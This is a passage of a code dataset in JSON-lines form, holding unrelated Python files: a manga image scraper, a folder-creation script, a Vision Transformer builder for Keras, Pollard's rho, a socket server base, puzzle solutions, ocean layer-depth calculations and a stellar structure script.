to_string(list[i].tipo_item)\n resultado['col6'] = to_string(list[i].valor)\n resultado['col7'] = to_string(list[i].tipo_item)\n lista.append(resultado)\n return lista","sub_path":"app/main/controllers/Item_cardapio_controller.py","file_name":"Item_cardapio_controller.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"214033658","text":"import requests\nimport urllib\nimport bs4\nimport json\n#opening the JSON dump in read form\nwith open('mpdict.json', 'rb') as fp:\n\tmpdict = json.load(fp)\nmanga = raw_input('Enter the name of the manga that you want to download from (Note:If the name has spaces in it, replace the spaces with hyphens): ')\nchapter = raw_input(\"Enter the chapter number that you want to download : \")\n#building the url from the input data\nurl = 'http://www.mangapanda.com/'+str(mpdict[manga][0])+'-'+str(int(mpdict[manga][1])+int(chapter))+'-1/'+str(manga)+'/chapter-'+str(chapter)+'.html'\n#this part the /'+str(manga)+'/ seems to not effect the url loading at all\nh = {'User-Agent':'Mozilla/5.0'}\nresponse = requests.get(url, headers=h)\nsoup = bs4.BeautifulSoup(response.text)\nlist = soup.select('option[value]')\n#link is the list of all the pages in the chapter\nlink = [i['value'] for i in list]\n#downloading the pages, they get saved into the working directory\nfor i in range(len(list)):\n\tpageres = requests.get('http://www.mangapanda.com'+link[i], headers=h)\n\tsoup = bs4.BeautifulSoup(pageres.text)\n\tlist = soup.select('img#img')\n\tname = list[0]['alt']\n\timglink = list[0]['src']\t\n\turllib.urlretrieve(imglink, name+'.jpg')\n\n\n","sub_path":"mangapandascraper.py","file_name":"mangapandascraper.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"503088345","text":"\"\"\"\nAuthor: Kaushik Bhimraj\nDesc: A slimmed down more efficient version of Broccoli\n Code checks whether a folder already exists or needs to be created.\n It will not create\n\"\"\"\n\nimport os\nfrom OldCode.Unit import stitch\nfrom distutils.dir_util import copy_tree\nimport numpy as np\nimport time\n\n\ndef prodfisses(drive, product, customer_name, customer_location, job_number, job_name):\n fis_folder_template = drive + '\\\\00_CN_(RENAME)_v3\\\\FIS\\\\Location\\\\Project_Name_Number'\n drive = drive + '\\\\'\n customer_folder = stitch(drive, 
customer_name)\n print(customer_name + '...' + customer_folder[1])\n try:\n os.makedirs(customer_folder[0] + product + '\\\\')\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n print(product + '...Already exists...')\n path1 = customer_folder[0] + product + '\\\\'\n\n location_folder = stitch(path1, customer_location)\n print(customer_location + ' ... ' + location_folder[1])\n\n try:\n os.makedirs(location_folder[0] + 'Master_Drawings')\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n print('Standards folder...Already exists...')\n else:\n pass\n\n job_name_replace = job_name.replace(' ', '_')\n job_name_title = job_name_replace.title()\n job0 = '44OP-' + job_number\n job = job0 + '_' + job_name_title\n\n new_path = location_folder[0] + job + '\\\\'\n try:\n os.mkdir(new_path)\n flag = 'Created...'\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n flag = 'Already exists...'\n\n print('Copying deployment package...')\n if flag == 'Created...':\n copy_tree(fis_folder_template, new_path)\n else:\n print('Job exists, contents will not be overwritten...')\n\n f = np.load(drive + \"00_CN_(RENAME)_v3\\\\JobList.npy\").item()\n f[job0] = new_path\n np.save(drive + \"00_CN_(RENAME)_v3\\\\JobList.npy\", f)\n print('Added data into database...')\n\n try:\n os.makedirs(path1 + 'Standards')\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n print('Standards folder...Already exists...')\n else:\n pass\n text_file = open(drive + '00_CN_(RENAME)_v3\\\\EFSFolderHistory.txt', 'a')\n text_file.write(os.getlogin() + ' ' + product + ' ' + customer_name + ' ' + customer_location\n + ' ' + job_number + ' ' + job_name + ' ' + time.strftime(\"Time: %H:%M:%S Date: %m-%d-20%y\")\n + '\\n')\n print('User information saved...')\n return()\n\n","sub_path":"OldCode/ProdFIS.py","file_name":"ProdFIS.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"539324031","text":"# type: ignore\nimport tensorflow as tf\nfrom . import layers, utils\n\nCONFIG_B = {\n \"dropout\": 0.1,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n \"num_layers\": 12,\n \"hidden_size\": 768,\n}\n\nCONFIG_L = {\n \"dropout\": 0.1,\n \"mlp_dim\": 4096,\n \"num_heads\": 16,\n \"num_layers\": 24,\n \"hidden_size\": 1024,\n}\n\nBASE_URL = \"https://github.com/faustomorales/vit-keras/releases/download/dl/\"\n\nWEIGHTS = {\n False: {\n \"B16\": (\n BASE_URL + \"ViT-B_16_imagenet21k.npz\",\n \"ViT-B_16_imagenet21k.npz\",\n ),\n \"B32\": (BASE_URL + \"ViT-B_32_imagenet21k.npz\", \"ViT-B_32_imagenet21k.npz\"),\n # We're using the fine-tuned weights here because the non-fine-tuned weights\n # are not available yet. 
See https://github.com/googlse-research/vision_transformer/issues/15\n \"L16\": (\n BASE_URL + \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n ),\n \"L32\": (BASE_URL + \"ViT-L_32_imagenet21k.npz\", \"ViT-L_32_imagenet21k.npz\"),\n },\n True: {\n \"B16\": (\n BASE_URL + \"ViT-B_16_imagenet21k+imagenet2012.npz\",\n \"ViT-B_16_imagenet21k+imagenet2012.npz\",\n ),\n \"B32\": (\n BASE_URL + \"ViT-B_32_imagenet21k+imagenet2012.npz\",\n \"ViT-B_32_imagenet21k+imagenet2012.npz\",\n ),\n \"L16\": (\n BASE_URL + \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n ),\n \"L32\": (\n BASE_URL + \"ViT-L_32_imagenet21k+imagenet2012.npz\",\n \"ViT-L_32_imagenet21k+imagenet2012.npz\",\n ),\n },\n}\n\n\ndef preprocess_inputs(X):\n \"\"\"Preprocess images\"\"\"\n return tf.keras.applications.imagenet_utils.preprocess_input(\n X, data_format=None, mode=\"tf\"\n )\n\n\ndef build_model(\n image_size: int,\n patch_size: int,\n num_layers: int,\n hidden_size: int,\n num_heads: int,\n mlp_dim: int,\n classes: int,\n dropout=0.1,\n activation=\"linear\",\n include_top=True,\n representation_size=None,\n):\n \"\"\"Build a ViT model.\n\n Args:\n image_size: The size of input images.\n patch_size: The size of each patch (must fit evenly in image_size)\n classes: optional number of classes to classify images\n into, only to be specified if `include_top` is True, and\n if no `weights` argument is specified.\n num_layers: The number of transformer layers to use.\n hidden_size: The number of filters to use\n num_heads: The number of transformer heads\n mlp_dim: The number of dimensions for the MLP output in the transformers.\n dropout_rate: fraction of the units to drop for dense layers.\n activation: The activation to use for the final layer.\n include_top: Whether to include the final classification layer. If not,\n the output will have dimensions (batch_size, hidden_size).\n representation_size: The size of the representation prior to the\n classification layer. 
If None, no Dense layer is inserted.\n \"\"\"\n assert image_size % patch_size == 0, \"image_size must be a multiple of patch_size\"\n x = tf.keras.layers.Input(shape=(image_size, image_size, 3))\n y = tf.keras.layers.Conv2D(\n filters=hidden_size,\n kernel_size=patch_size,\n strides=patch_size,\n padding=\"valid\",\n name=\"embedding\",\n )(x)\n y = tf.keras.layers.Reshape((-1, hidden_size))(y)\n y = layers.ClassToken(name=\"class_token\")(y)\n y = layers.AddPositionEmbs(name=\"Transformer/posembed_input\")(y)\n for n in range(num_layers):\n y, _ = layers.TransformerBlock(\n num_heads=num_heads,\n mlp_dim=mlp_dim,\n dropout=dropout,\n name=f\"Transformer/encoderblock_{n}\",\n )(y)\n y = tf.keras.layers.LayerNormalization(\n epsilon=1e-6, name=\"Transformer/encoder_norm\"\n )(y)\n y = tf.keras.layers.Lambda(lambda v: v[:, 0], name=\"ExtractToken\")(y)\n if representation_size is not None:\n y = tf.keras.layers.Dense(\n representation_size, name=\"pre_logits\", activation=\"tanh\"\n )(y)\n if include_top:\n y = tf.keras.layers.Dense(classes, name=\"head\", activation=activation)(y)\n return tf.keras.models.Model(inputs=x, outputs=y)\n\n\ndef load_pretrained(key, model, pretrained_top):\n \"\"\"Load model weights for a known configuration.\"\"\"\n origin, fname = WEIGHTS[pretrained_top][key]\n local_filepath = tf.keras.utils.get_file(fname, origin, cache_subdir=\"weights\")\n utils.load_weights_numpy(model, local_filepath, pretrained_top)\n\n\ndef vit_b16(\n image_size: int = 224,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-B16. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_B,\n patch_size=16,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=768 if pretrained and not pretrained_top else None,\n )\n if pretrained:\n load_pretrained(key=\"B16\", model=model, pretrained_top=pretrained_top)\n return model\n\n\ndef vit_b32(\n image_size: int = 224,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-B32. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_B,\n patch_size=32,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=768 if pretrained and not pretrained_top else None,\n )\n if pretrained:\n load_pretrained(key=\"B32\", model=model, pretrained_top=pretrained_top)\n return model\n\n\ndef vit_l16(\n image_size: int = 384,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-L16. 
All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_L,\n patch_size=16,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=None,\n )\n if pretrained:\n load_pretrained(key=\"L16\", model=model, pretrained_top=pretrained_top)\n return model\n\n\ndef vit_l32(\n image_size: int = 384,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-L32. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_L,\n patch_size=32,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=1024 if pretrained and not pretrained_top else None,\n )\n if pretrained:\n load_pretrained(key=\"L32\", model=model, pretrained_top=pretrained_top)\n return model\n","sub_path":"vit_keras/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173225520","text":"from numthe import fast_exp\nfrom numthe import find_inverse_modulo_n\nfrom math import gcd\n\n\nclass PollardsRho:\n \"\"\"\n Pollard's Rho factoring algorithm\n \"\"\"\n def __init__(self, p, g, h):\n self.p = p\n self.g = g\n self.h = h\n\n def random_function(self, x, alpha, beta):\n \"\"\"\n Pollard's random function, described by Pollard\n Args:\n x: parameter of f()\n alpha: exponent for g\n beta: exponent for h\n Returns:\n randomized Pollard's function\n \"\"\"\n if 0 <= x % self.p < self.p/3.0:\n return (self.g * x) % self.p, (alpha + 1) % (self.p-1), beta % (self.p-1)\n\n elif self.p/3.0 <= x % self.p < 2*self.p/3.0:\n return fast_exp(x, 2, self.p), 2*alpha % (self.p-1), 2*beta % (self.p-1)\n\n else:\n return (self.h * x) % self.p, alpha % (self.p-1), (beta + 1) % (self.p-1)\n\n def find_collision(self):\n \"\"\"\n Runs the iterations to find the collision of the tail and the loop\n Returns:\n xi, x2i, for g -> alpha, beta, for h -> gamma, delta\n \"\"\"\n x, y = 1, 1\n alpha, beta, gamma, delta = 0, 0, 0, 0\n\n for i in range(0, 1000):\n # print(\"{}, X = {}, Y = {}, alp = {}, bet = {}, gam = {}, del = {}\"\n # .format(i, x, y, alpha, beta, gamma, delta))\n\n # define temporary y, gamma and delta to pass to the function again to obtain f(f(x))\n aux_y, aux_gamma, aux_delta = self.random_function(y, gamma, delta)\n y, gamma, delta = self.random_function(aux_y, aux_gamma, aux_delta)\n x, alpha, beta = self.random_function(x, alpha, beta)\n\n # if we find the collision, return all the variables\n if x == y:\n print(\"Collision found at iteration: {}, X = {}, Y = {}, alpha = {}, beta = {}, gamma = {}, delta = {}\"\n .format(i + 1, x, y, alpha, beta, gamma, delta))\n\n return x, y, alpha, beta, gamma, delta\n\n def compute(self):\n \"\"\"\n Computes the rest of the algorithm, based on the collision.\n Returns:\n the answer to the initial DLP problem\n \"\"\"\n p = self.p\n h = self.h\n g = self.g\n\n # run until we find the 
collision\n x, y, alpha, beta, gamma, delta = self.find_collision()\n\n # once we found the collision we assign the exponents of h and g\n g_exp = alpha - gamma + (p - 1)\n h_exp = delta - beta\n\n # now we need to find gcd(h_exp, p - 1) and\n # a such that: a * h_exp = gcd(h-exp, p - 1)\n # here if gcd is 1 then a is just an inverse of exponent of h mod p-1\n a = gcd(h_exp, p - 1) * find_inverse_modulo_n(h_exp, p - 1) % (p - 1)\n\n # reassign the exponents of h and g multiplying both by a\n g_exp = g_exp * a % (p - 1)\n h_exp = h_exp * a % (p - 1)\n\n # divide the exponent of h and p - 1 by gcd(h_exp, p-1)\n j = g_exp / gcd(h_exp, p - 1)\n k = (p - 1) / gcd(h_exp, p - 1)\n\n # form an empty array\n array = list()\n # find the values to raise g into\n for i in range(0, gcd(h_exp, p - 1)):\n array.append(int(j + k * i))\n\n # raise g into the powers and check which is equal to h\n for number in array:\n if fast_exp(g, number, p) == h:\n # return the exponent which is the answer to the DLP\n return number\n\n\ndef main():\n\n # initial data\n g = 19\n h = 24717\n p = 48611\n\n # instantiate the algorithm\n pollards = PollardsRho(p, g, h)\n x = pollards.compute()\n\n print(\"x = {}\".format(x))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Pollard's Rho Factoring Algorithm/pollardsrho.py","file_name":"pollardsrho.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"391571542","text":"import socket\nimport threading\n\n\nclass BaseServer:\n\n def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n def start(self, host, port, handler_builder):\n self.sock.bind((host, port))\n self.sock.listen()\n\n try:\n while True:\n (client, address) = self.sock.accept()\n client.settimeout(30)\n handler = handler_builder(client, address)\n t = threading.Thread(target=handler.handle)\n t.start()\n\n except KeyboardInterrupt:\n self.sock.shutdown(socket.SHUT_WR)\n self.sock.close()\n","sub_path":"server/base_server.py","file_name":"base_server.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"303798256","text":"# Three stones are on a number line at positions a, b, and c.\n\n# Each turn, you pick up a stone at an endpoint (ie., either the lowest or highest position stone), and move it to an unoccupied position between those endpoints. Formally, let's say the stones are currently at positions x, y, z with x < y < z. You pick up the stone at either position x or position z, and move that stone to an integer position k, with x < k < z and k != y.\n\n# The game ends when you cannot make any more moves, ie. the stones are in consecutive positions.\n\n# When the game ends, what is the minimum and maximum number of moves that you could have made? 
Return the answer as a length 2 array: answer = [minimum_moves, maximum_moves]\n\n \n\n# Example 1:\n\n# Input: a = 1, b = 2, c = 5\n# Output: [1,2]\n# Explanation: Move the stone from 5 to 3, or move the stone from 5 to 4 to 3.\n\n# Example 2:\n\n# Input: a = 4, b = 3, c = 2\n# Output: [0,0]\n# Explanation: We cannot make any moves.\n\n# Example 3:\n\n# Input: a = 3, b = 5, c = 1\n# Output: [1,2]\n# Explanation: Move the stone from 1 to 4; or move the stone from 1 to 2 to 4.\n\n \n\n# Note:\n\n# 1 <= a <= 100\n# 1 <= b <= 100\n# 1 <= c <= 100\n# a != b, b != c, c != a\n\n \ndef sum(a, b, c):\n count = (b-a - 1) + (c-b - 1)\n return count\n\ndef numMove(a, b, c):\n \"\"\"\n :type a: int\n :type b: int\n :type c: int\n :rtype: List[int]\n \"\"\"\n list = [a,b,c]\n list.sort()\n max_num = sum(list[0],list[1],list[2])\n min_num = 0\n print(list)\n if (max_num != 0):\n if (list[2] - list[1] == 2) or (list[2] - list[1] == 1) or (list[1] - list[0] == 1) or (list[1] - list[0] == 2):\n min_num = 1\n else:\n min_num = 2\n\n return [min_num,max_num]\n\nprint(numMove(1,2,5))\n\nclass Solution(object):\n def numMovesStones(self, a, b, c):\n \"\"\"\n :type a: int\n :type b: int\n :type c: int\n :rtype: List[int]\n \"\"\"\n return numMove(a,b,c)\n\n\n","sub_path":"stone.py","file_name":"stone.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"332479074","text":"\n\nvalidPaths=[\n 'C:\\\\Users\\\\USER_NAME_HERE\\\\Documents', #note, this is a default path.\n 'NETWORK_ROOT:\\\\NETWORK_DIRECTORIES',\n]\n\nblackList=[''] #list of strings for filenames you want the metadata for, but \n #not those to archive (i.e. \"tax records\" \"sensitive.doc\")\n\ninvalidPaths=[ #list of known folders with documents I do not want\n 'C:\\\\Users\\\\Administrator\\\\Documents\\\\Exclude',\n ]\n \nexcludeFiles=['thumbs.db'] #files that you don't want to scrape or archive (i.e. 
useless files, inaccessible files)\n\ndataFormat={ #key for all variables that can go into the database for storage\n 'type': None,\n 'fileName': None,\n 'path': None,\n 'author': None,\n 'createdDate': None,\n 'lastAuthor': None,\n 'lastSaveTime':None ,\n 'scrapeTime':None ,\n 'fileSize':None,\n 'templateFile':None,\n 'revisions':None,\n 'totalEditingTime':None,\n 'archivedLocation':None,\n 'flag':None}\n\nnetworkDataFormat={ #Key for variables used in generating a co-editing network\n 'title':None,\n 'author': None,\n 'createdDate': None,\n 'lastAuthor': None,\n 'lastSaveTime':None ,\n }\n\nmapper={ #Translater for Microsoft parameter names and dataFormat names.\n 'Author':'author',\n 'Creation Date':'createdDate',\n 'Number of Bytes':'fileSize',\n 'Last Author':'lastAuthor',\n 'Last Save Time':'lastSaveTime',\n 'Revision Number':'revisions',\n 'Template':'templateFile',\n 'Total Editing Time':'totalEditingTime',\n 'type':'type',\n 'fileName':'fileName',\n 'path':'path',\n 'author':'author',\n 'createdDate':'createdDate',\n 'lastAuthor':'lastAuthor',\n 'lastSaveTime':'lastSaveTime',\n 'scrapeTime':'scrapeTime',\n 'fileSize':'fileSize',\n 'templateFile':'templateFile',\n 'template':'templateFile',\n 'revisions':'revisions',\n 'totalEditingTime':'totalEditingTime',\n 'archivedLocation':'archivedLocation',\n 'flag':'flag'\n}\n\n\n\n","sub_path":"ScrapeVariables.py","file_name":"ScrapeVariables.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"604479283","text":"#BOJ 9461 파도반 수열\n\nT = int(input())\n\nfor i in range(0,T):\n N = int(input())\n dpList = [0 for j in range(0,N+1)]\n\n if 1 <= N <= 3:\n print(1)\n elif N == 4 or N == 5:\n print(2)\n elif N == 6:\n print(3)\n elif N == 7:\n print(4)\n elif N == 8:\n print(5)\n else:\n dpList[1] = dpList[2] = dpList[3] = 1\n dpList[4] = dpList[5] = 2\n dpList[6] = 3\n dpList[7] = 4\n dpList[8] = 5\n for j in range(9, N+1):\n dpList[j] = dpList[j-1] + dpList[j-5]\n print(dpList[N])","sub_path":"Dynamic Programming/BOJ_9461_파도반수열.py","file_name":"BOJ_9461_파도반수열.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"620995050","text":"#coding:utf-8\n\n#from numba import jit,f8,i1\nimport numpy as np\nimport subroutine\nfrom scipy import inf, nan\nimport density\nimport os\nimport time\nimport Climatology_and_InterannualVariation as CI\n\ndef make_ILD(year,month,product_n=3,dt=0.2):\n\tILD, _, _ = make_data(year, month, product_n, dt)\n\treturn ILD\n\ndef make_MLD(year,month,product_n=3,dt=0.2):\n\t_, MLD, _ = make_data(year, month, product_n, dt)\n\treturn MLD\n\ndef make_BLT(year,month,product_n=3,dt=0.2):\n\t_, _, BLT = make_data(year, month, product_n, dt)\n\treturn BLT\n\ndef make_data(year,month,product_n=3,dt=0.2):\n\t# ESTOC、ORAS4などで、層厚の計算を行うための関数。\n\t# MOAA_GPVだけ、格納されているのが(ポテンシャル水温でなく)通常の水温なので、まずポテンシャル水温への変換が必要\n\t_,title_name,_=subroutine.product_n_to_name(product_n)\n\tt=subroutine.get_data(year,month,'t',0,title_name)\n\ts=subroutine.get_data(year,month,'s',0,title_name)\n\tILD, MLD, BLT = make_data_from_ts(t, s, product_n, dt)\n\treturn ILD, MLD, BLT\n\n\ndef make_ILD_from_ts(t, s, product_n = 3, dt = 0.2):\n\tILD, _, _ = make_data_from_ts(t, s, product_n, dt)\n\treturn ILD\n\n\ndef make_MLD_from_ts(t, s, product_n = 3, dt = 0.2):\n\t_, MLD, _ = make_data_from_ts(t, s, product_n, dt)\n\treturn MLD\n\n\ndef make_BLT_from_ts(t, s, product_n = 3, dt = 
0.2):\n\t_, _, BLT = make_data_from_ts(t, s, product_n, dt)\n\treturn BLT\n\n\ndef make_data_from_ts(t, s, product_n = 3, dt = 0.2):\n\t_,title_name,_=subroutine.product_n_to_name(product_n)\n\txgrid,ygrid,zgrid=subroutine.product_grid_info('t','data',product_n)\n\n\t# MOAA_GPVだけ、格納されているのが(ポテンシャル水温でなく)通常の水温なので、まずポテンシャル水温への変換が必要\n\tif title_name=='MOAA_GPV':\n\t\ttheta=np.zeros((t.shape[0],t.shape[1],t.shape[2]))\n\t\tfor m in range(0,zgrid.size):\n\t\t\ttheta[:,:,m]=density.poT(t[:,:,m],s[:,:,m],zgrid[m])\n\n\t\tt=theta\n\t\tt[np.where(abs(t)== inf)]=nan\n\n\trho=density.rho(t,s,0)\n\trho[np.where(abs(rho)== inf)]=nan\n\txn=xgrid.size\n\tyn=ygrid.size\n\tILD=np.zeros([yn,xn])\n\tMLD=np.zeros([yn,xn])\n\tBLT=np.zeros([yn,xn])\n\tfor i in range(0,xn):\n\t\tfor j in range(0,yn):\n\t\t\tif np.isnan(t[j,i,0]) == 0:\n\t\t\t\ttpro=t[j,i,:]\n\t\t\t\trhopro=rho[j,i,:]\n\t\t\t\tspro = s[j, i, :]\n\t\t\t\tILD[j, i], MLD[j, i], BLT[j, i] = make_data_from_profile(tpro, spro, rhopro, zgrid, dt)\n\t\t\telse:\n\t\t\t\tILD[j,i]=nan\n\t\t\t\tMLD[j,i]=nan\n\t\t\t\tBLT[j, i] = nan\n\n\n\treturn ILD,MLD,BLT\n\n\ndef make_data_from_profile(tpro, spro, rhopro, zgrid, dt = 0.2):\n\tdrho=density.rho(tpro[0]-dt,spro[0],0)-density.rho(tpro[0],spro[0],0)\n\t# ILD calculating\n\tif np.where(tpro[0]-tpro>dt)[0].size==0:\n\t\t# 全層でsst-dt度より水温が高かった時。\n\t\t# 海底までの深さをILDとする。\n\t\tn1=max(np.where(np.isnan(tpro) == 0)[0])\n\t\tz1=zgrid[n1]\n\t\tILD=round(z1,0)\n\telse:\n\t\tn1=min(np.where(tpro[0]-tpro>dt)[0])-1\n\t\tn2=n1+1\n\t\tz1=zgrid[n1]\n\t\tz2=zgrid[n2]\n\t\tt1=tpro[n1]\n\t\tt2=tpro[n2]\n\t\tD=z2-z1\n\t\tdz=(t1-(tpro[0]-dt))/(t1-t2)*D\n\t\tILD=round(z1+dz,0)\n\t# ILD calculating\n\n\t# MLD calculating\n\tif np.where(rhopro-rhopro[0]>drho)[0].size==0:\n\t\t# 全層でssrho+drhoより密度が低かった時。\n\t\t# 海底までの深さをMLDとする。\n\t\tn1=max(np.where(rhopro!=inf)[0])\n\t\tn1=max(np.where(np.isnan(rhopro) == 0)[0])\n\t\tz1=zgrid[n1]\n\t\tMLD=round(z1,0)\n\telse:\n\t\tn1=min(np.where(rhopro-rhopro[0]>drho)[0])-1\n\t\tn2=n1+1\n\t\tz1=zgrid[n1]\n\t\tz2=zgrid[n2]\n\t\trho1=rhopro[n1]\n\t\trho2=rhopro[n2]\n\t\tD=z2-z1\n\t\tdz=(rho1-(rhopro[0]+drho))/(rho1-rho2)*D\n\t\tMLD=round(z1+dz,0)\n\t# MLD calculating\n\n\tBLT=ILD-MLD\n\tif BLT < 0.0:\n\t\tBLT = 0.0\n\n\treturn ILD, MLD, BLT\n\n\n\ndef cal(d,t,s,dt):\t\t\t\t\t# 水温と塩分それぞれのプロファイル、及びそのデータが得られた水深のデータを入れることによって、層厚を計算することができるプログラム。\n\timport numpy as np\n\timport subroutine\n\timport density\n\ttp=subroutine.interpolate(t,d)\n\tsp=subroutine.interpolate(s,d)\n\trhop=density.rho(tp,sp,0)\n\tdrho=density.rho(tp[0]-dt,sp[0],0)-rhop[0]\n\tILD=tp[np.where(tp>=tp[0]-dt)].size\n\tMLD=rhop[np.where(rhop<=rhop[0]+drho)].size\n\tBLT=ILD-MLD\n\treturn [MLD,ILD,BLT]\n\n\ndef easy_cal(d,t,s,dt):\t\t\t# 線形内挿を使わずに手っ取り早く計算いたします\n\timport numpy as np\n\timport subroutine\n\timport density\n\trho=density.rho(t,s,0)\n\tdrho=density.rho(t[0]-dt,s[0],0)-rho[0]\n\tILD=max(d[np.where(t>=t[0]-dt)])\n\tMLD=max(d[np.where(rho<=rho[0]+drho)])\n\tBLT=ILD-MLD\n\treturn [MLD,ILD,BLT]\n\n\ndef overdraw_argopoint(plt,year,month,var,dt,cb_min,cb_max,my_color,Area_id):\n\t# MLD:var=0,ILD:var=1,BLT:var=2\n\timport subroutine\n\timport numpy as np\n\timport matplotlib.pyplot as plt\n\timport AQC\n\timport Area\n\tAA = Area.Area[Area_id]\n\ttemp,salt,pres,lon,lat=AQC.get_data(year,month)\n\tN_PROF=pres.shape[0]\n\tslat = AA.slat\n\tnlat = AA.nlat\n\twlon = AA.wlon\n\telon = AA.elon\n\tMLD=np.zeros(N_PROF)\n\tILD=np.zeros(N_PROF)\n\tBLT=np.zeros(N_PROF)\n\tfor i in range(0,N_PROF):\n\t\tif lat[i]>=slat and lat[i]<=nlat and lon[i]>=wlon 
and lon[i]<=elon:\n\t\t\tMLD[i],ILD[i],BLT[i]=easy_cal(pres[i,:],temp[i,:],salt[i,:],dt)\n\t\t\tMLD[i]=to_5m(MLD[i])\n\t\t\tILD[i]=to_5m(ILD[i])\n\t\telse:\n\t\t\tMLD[i],ILD[i],BLT[i]=1000.0,1000.0,1000.0\n\n\tif var==0:\n\t\ttheta=MLD\n\telif var==1:\n\t\ttheta=ILD\n\telif var==2:\n\t\ttheta=BLT\n\telse:\n\t\traise Exception('error! your var is not valid!')\n\n\tinterval_of_cf=np.arange(cb_min,cb_max+5.0,5.0)\n\tcmap=subroutine.get_cmap(my_color)\n\tplt.scatter(lon,lat,c=theta,s=75,vmin=min(interval_of_cf),vmax=max(interval_of_cf),cmap=cmap)\n\treturn plt\n\n\ndef to_5m(D):\t\t\t\t\t# 層厚が5メートル以下と出た時に5メートルにする\n\tif D<=5.0:\n\t\tD=5.01\n\treturn D\n","sub_path":"making_LayerDepth_data.py","file_name":"making_LayerDepth_data.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"469082047","text":"# execute on interactive command line\n# %pylab\nimport sys\nsys.path.append('../mypylib')\nfrom stars import star_utils as su\n\n# print su.grav_const\n# G in units of 'cm^3 g^-1 s^-2'\n# introduce code units:\n# one unit of density: g_cu * cm_cu**-3 = 0.1691355\n# one length unit: 1R_sun = 6.955e+10 cm\n# one unit of mass: 1M_sun = 1.9891e+33 g\n# one unit of time: 1yr = 3.14e7s\nL_cu = su.rsun_cm # length in code unit\ncm_cu = 1./L_cu \nM_cu = su.msun_g\ng_cu = 1./M_cu\nT_cu = 3.14e7\ns_cu = 1/T_cu\nG_cu = su.grav_const * cm_cu**3 * g_cu**-1 * s_cu**-2\n# code unit of G: R_sun^3 Msun^-1 yr^-2\n# one unit of pressure: [cgs: g cm^-1 s^-2] -> Msun Rsun^-1 yr^-2\n\nrho_c = 0.0010887436239364599 # in cgs\nrho_c = rho_c * g_cu * cm_cu**-3 # cu\nP_c = 89386992764.462601 # in cgs\nP_c = P_c * g_cu * cm_cu**-1 * s_cu**-2 # cu\nprint(rho_c, P_c)\n\n# p2.get('radius')[-1],p2.get('mass')[-1]\nr_c = 0.058674868915132176 # in L_cu = R_sun\nm_c = 1.5612859321774683e-07 # in M_cu = M_sun\n\n# EOS:\ngamma_ad = 5./3.\nK_ad = P_c/(rho_c**gamma_ad)\nK = K_ad\nprint(K)\n\ndef rho(p): # polytropic EOS\n return (p/K)**(1./gamma_ad)\n\n# unit tester EOS:\nprint(rho(P_c), rho_c)\n\n# RHS of system of ODEs\ndef f_rhs(y,r):\n dm_dr = 4.*pi*(r**2)*rho(y[1])\n 